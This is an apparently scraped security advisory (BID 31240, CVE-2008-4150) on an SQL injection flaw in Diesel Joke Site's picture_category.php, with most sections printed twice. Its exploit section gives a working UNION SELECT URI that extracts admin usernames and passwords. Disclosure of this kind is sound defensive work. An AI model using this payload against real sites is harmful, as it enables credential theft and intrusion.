Diesel Joke Site 'picture_category.php' SQL Injection Vulnerability
BID:31240
Info
Diesel Joke Site 'picture_category.php' SQL Injection Vulnerability
| Bugtraq ID: | 31240 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4150 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 18 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | sarbot511 |
| Vulnerable: |
DieselScripts Diesel Joke Site 0 |
| Not Vulnerable: | |
Discussion
Diesel Joke Site 'picture_category.php' SQL Injection Vulnerability
Diesel Joke Site is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Diesel Joke Site is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
Diesel Joke Site 'picture_category.php' SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
Solution / Fix
Diesel Joke Site 'picture_category.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Diesel Joke Site 'picture_category.php' SQL Injection Vulnerability
References:
References:
- Diesel Joke Site Homepage (DieselScripts)